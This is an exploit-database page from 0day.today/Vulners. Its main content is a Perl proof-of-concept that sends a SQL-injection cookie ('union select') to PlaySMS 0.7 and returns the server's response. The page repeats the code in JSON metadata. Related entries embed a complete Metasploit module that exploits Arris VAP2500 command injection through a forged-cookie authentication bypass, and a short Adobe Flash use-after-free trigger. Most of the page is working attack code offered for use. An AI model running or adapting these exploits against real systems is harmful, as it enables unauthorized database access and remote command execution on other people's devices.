Search...

PlaySMS <= 0.7 SQL Injection Exploit

2004-08-19T00:00:00

ID 1337DAY-ID-8424
Type zdt
Reporter Noam Rathaus
Modified 2004-08-19T00:00:00

Description

Exploit for linux platform in category remote exploits

                                        
                                            ====================================
PlaySMS &lt;= 0.7 SQL Injection Exploit
====================================

#!/usr/bin/perl 
# PlaySMS version 0.7 and prior SQL Injection PoC 
# Written by Noam Rathaus of Beyond Security Ltd. 
# 

use IO::Socket; 
use strict; 

my $host = $ARGV[0]; 

my $remote = IO::Socket::INET-&gt;new ( Proto =&gt; "tcp", PeerAddr =&gt; $host, PeerPort =&gt; "80" ); 

unless ($remote) { die "cannot connect to http daemon on $host" } 

print "connected "; 

$remote-&gt;autoflush(1); 

my $http = "GET /~playsms/fr_left.php HTTP/1.1 
Host: $host:80 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1 
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 
Cookie: vc1=ticket; vc2='%20union%20select%20'ticket; 
Content-Type: application/x-www-form-urlencoded 
Connection: close 

"; 

print "HTTP: [$http] "; 
print $remote $http; 
sleep(1); 
print "Sent "; 

while (&lt;$remote&gt;) 
{ 
print $_; 
} 
print " "; 

close $remote; 

 

#  0day.today [2018-04-04]  #

JSON Vulners Source

Initial Source

{"published": "2004-08-19T00:00:00", "id": "1337DAY-ID-8424", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:03:34", "bulletin": {"published": "2004-08-19T00:00:00", "id": "1337DAY-ID-8424", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.0, "modified": "2016-04-19T04:03:34", "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N/"}}, "hash": "f5cd1cfbf0531d9dfebd0212d2b49a63632c1a6aa15282bfbfc918c634b4442b", "description": "Exploit for linux platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-19T04:03:34", "edition": 1, "title": "PlaySMS <= 0.7 SQL Injection Exploit", "href": "http://0day.today/exploit/description/8424", "modified": "2004-08-19T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "http://0day.today/exploit/8424", "references": [], "reporter": "Noam Rathaus", "sourceData": "====================================\r\nPlaySMS <= 0.7 SQL Injection Exploit\r\n====================================\r\n\r\n#!/usr/bin/perl \r\n# PlaySMS version 0.7 and prior SQL Injection PoC \r\n# Written by Noam Rathaus of Beyond Security Ltd. \r\n# \r\n\r\nuse IO::Socket; \r\nuse strict; \r\n\r\nmy $host = $ARGV[0]; \r\n\r\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, PeerPort => \"80\" ); \r\n\r\nunless ($remote) { die \"cannot connect to http daemon on $host\" } \r\n\r\nprint \"connected \"; \r\n\r\n$remote->autoflush(1); \r\n\r\nmy $http = \"GET /~playsms/fr_left.php HTTP/1.1 \r\nHost: $host:80 \r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \r\nFirefox/0.9.1 \r\nAccept: \r\ntext/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 \r\nAccept-Language: en-us,en;q=0.5 \r\nAccept-Encoding: gzip,deflate \r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \r\nKeep-Alive: 300 \r\nCookie: vc1=ticket; vc2='%20union%20select%20'ticket; \r\nContent-Type: application/x-www-form-urlencoded \r\nConnection: close \r\n\r\n\"; \r\n\r\nprint \"HTTP: [$http] \"; \r\nprint $remote $http; \r\nsleep(1); \r\nprint \"Sent \"; \r\n\r\nwhile (<$remote>) \r\n{ \r\nprint $_; \r\n} \r\nprint \" \"; \r\n\r\nclose $remote; \r\n\r \n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "afbd2c0343f8a7e060172ba50a219682", "key": "href"}, {"hash": "47e51bf716fbf4e5443a6996e54335b9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "db7dd98efd79878660ca3eff733a4858", "key": "sourceData"}, {"hash": "12772d892ae392bec17dcc687c613d12", "key": "sourceHref"}, {"hash": "d1e369d8aac1dff2debb8e65d04477a2", "key": "modified"}, {"hash": "d1e369d8aac1dff2debb8e65d04477a2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9041e97e1d7590de4846f06b088ab35b", "key": "description"}, {"hash": "47085bdd564155ae1b3d94e8123eadd3", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for linux platform in category remote exploits", "hash": "3615340324a622cb34d6c08599b005ace8857030d290484cf93181cd6bbe04d8", "enchantments": {"vulnersScore": 7.5}, "type": "zdt", "lastseen": "2018-04-04T17:30:45", "edition": 2, "title": "PlaySMS <= 0.7 SQL Injection Exploit", "href": "https://0day.today/exploit/description/8424", "modified": "2004-08-19T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/8424", "references": [], "reporter": "Noam Rathaus", "sourceData": "====================================\r\nPlaySMS <= 0.7 SQL Injection Exploit\r\n====================================\r\n\r\n#!/usr/bin/perl \r\n# PlaySMS version 0.7 and prior SQL Injection PoC \r\n# Written by Noam Rathaus of Beyond Security Ltd. \r\n# \r\n\r\nuse IO::Socket; \r\nuse strict; \r\n\r\nmy $host = $ARGV[0]; \r\n\r\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host, PeerPort => \"80\" ); \r\n\r\nunless ($remote) { die \"cannot connect to http daemon on $host\" } \r\n\r\nprint \"connected \"; \r\n\r\n$remote->autoflush(1); \r\n\r\nmy $http = \"GET /~playsms/fr_left.php HTTP/1.1 \r\nHost: $host:80 \r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 \r\nFirefox/0.9.1 \r\nAccept: \r\ntext/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 \r\nAccept-Language: en-us,en;q=0.5 \r\nAccept-Encoding: gzip,deflate \r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 \r\nKeep-Alive: 300 \r\nCookie: vc1=ticket; vc2='%20union%20select%20'ticket; \r\nContent-Type: application/x-www-form-urlencoded \r\nConnection: close \r\n\r\n\"; \r\n\r\nprint \"HTTP: [$http] \"; \r\nprint $remote $http; \r\nsleep(1); \r\nprint \"Sent \"; \r\n\r\nwhile (<$remote>) \r\n{ \r\nprint $_; \r\n} \r\nprint \" \"; \r\n\r\nclose $remote; \r\n\r \n\n# 0day.today [2018-04-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9041e97e1d7590de4846f06b088ab35b", "key": "description"}, {"hash": "9c79c41a22ac7db7c06624bb711bde20", "key": "href"}, {"hash": "d1e369d8aac1dff2debb8e65d04477a2", "key": "modified"}, {"hash": "d1e369d8aac1dff2debb8e65d04477a2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "47085bdd564155ae1b3d94e8123eadd3", "key": "reporter"}, {"hash": "9c6b8cec28aef6520fde894186ea0304", "key": "sourceData"}, {"hash": "6826dc525af435b675555735f05bb259", "key": "sourceHref"}, {"hash": "47e51bf716fbf4e5443a6996e54335b9", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"result": {"zdt": [{"lastseen": "2018-04-13T07:51:36", "references": [], "edition": 2, "description": "Exploit for windows platform in category dos / poc", "reporter": "Google Security Research", "published": "2015-12-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "zdt", "title": "Adobe Flash TextField.replaceText - Use-After-Free", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8424"], "modified": "2015-12-18T00:00:00", "id": "1337DAY-ID-25734", "href": "https://0day.today/exploit/description/25734", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=584\r\n \r\nThere is a use-after-free in the TextField.replaceText function. If the function is called with a string parameter with toString defined, or an integer parameter with valueOf defined, the parent object of the TextField can be used after it is freed. Please note that all three parameters of this function are susceptible to this issue.\r\n \r\nA minimal PoC is as follows:\r\n \r\nvar times = 0;\r\nvar mc = this.createEmptyMovieClip(\"mc\", 101);\r\nvar tf = mc.createTextField(\"tf\", 102, 1, 1, 100, 100);\r\ntf.replaceText( 1, 2, {valueOf : func});\r\n \r\nfunction func(){\r\n \r\n mc.removeMovieClip();\r\n \r\n // Fix heap here\r\n \r\n return \"text\";\r\n \r\n }\r\n \r\nA sample swf and fla are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39048.zip\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25734"}, {"lastseen": "2018-04-02T03:25:18", "references": [], "description": "Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username.", "edition": 2, "reporter": "metasploit", "published": "2015-01-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "Arris VAP2500 Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8424", "CVE-2014-8423"], "modified": "2015-01-22T00:00:00", "id": "1337DAY-ID-23173", "href": "https://0day.today/exploit/description/23173", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Arris VAP2500 tools_command.php Command Execution',\r\n 'Description' => %q{\r\n Arris VAP2500 access points are vulnerable to OS command injection in the web management\r\n portal via the tools_command.php page. Though authentication is required to access this\r\n page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid\r\n username.\r\n },\r\n 'Author' =>\r\n [\r\n 'HeadlessZeke' # Vulnerability discovery and Metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2014-8423'],\r\n ['CVE', '2014-8424'],\r\n ['OSVDB', '115045'],\r\n ['OSVDB', '115046'],\r\n ['BID', '71297'],\r\n ['BID', '71299'],\r\n ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']\r\n ],\r\n 'DisclosureDate' => 'Nov 25 2014',\r\n 'Privileged' => true,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'Space' => 1024,\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic telnet'\r\n }\r\n },\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' => [[ 'Automatic', { }]],\r\n 'DefaultTarget' => 0\r\n ))\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_raw({\r\n 'method' => 'GET',\r\n 'uri' => '/tools_command.php',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n })\r\n if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n rescue ::Rex::ConnectionError\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - Trying to access the device ...\")\r\n\r\n unless check == Exploit::CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Failed to access the vulnerable device\")\r\n end\r\n\r\n print_status(\"#{peer} - Exploiting...\")\r\n\r\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\r\n exploit_cmd\r\n else\r\n exploit_session\r\n end\r\n end\r\n\r\n def exploit_cmd\r\n beg_boundary = rand_text_alpha(8)\r\n end_boundary = rand_text_alpha(8)\r\n\r\n begin\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri('/', 'tools_command.php'),\r\n 'vars_post' => {\r\n 'cmb_header' => '',\r\n 'txt_command' => \"echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}\"\r\n },\r\n 'method' => 'POST',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n })\r\n\r\n if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/\r\n print_good(\"#{peer} - Command sent successfully\")\r\n if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m\r\n print_status(\"#{peer} - Command output: #{$1}\")\r\n end\r\n else\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Command execution failed\")\r\n end\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\n\r\n def exploit_session\r\n begin\r\n send_request_cgi({\r\n 'uri' => normalize_uri('/', 'tools_command.php'),\r\n 'vars_post' => {\r\n 'cmb_header' => '',\r\n 'txt_command' => \"#{payload.encoded}\"\r\n },\r\n 'method' => 'POST',\r\n 'cookie' => \"p=#{Rex::Text.md5('super')}\"\r\n }, 3)\r\n rescue ::Rex::ConnectionError\r\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the web server\")\r\n end\r\n end\r\nend\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23173"}, {"lastseen": "2018-01-03T19:14:43", "references": [], "description": "ARRIS VAP2500 - WIRELESS VIDEO ACCESS POINT \r This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is not required to exploit this vulnerability.\r The specific flaw exists within the handling of user authentication. The issue lies in the failure to compare the password when authenticating. An attacker can leverage this vulnerability to bypass authentication checks which can then be chained to execute code with root privileges.\n\nThis is private exploit. You can buy it at https://0day.today", "edition": 2, "reporter": "rrdw", "published": "2014-11-30T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "type": "zdt", "title": "ARRIS VAP2500 Management Portal Authentication Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8424"], "modified": "2014-11-30T00:00:00", "id": "1337DAY-ID-22946", "href": "https://0day.today/exploit/description/22946", "sourceData": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": ""}]}}

PlaySMS &lt;= 0.7 SQL Injection Exploit

Description

Exploit for linux platform in category remote exploits

PlaySMS <= 0.7 SQL Injection Exploit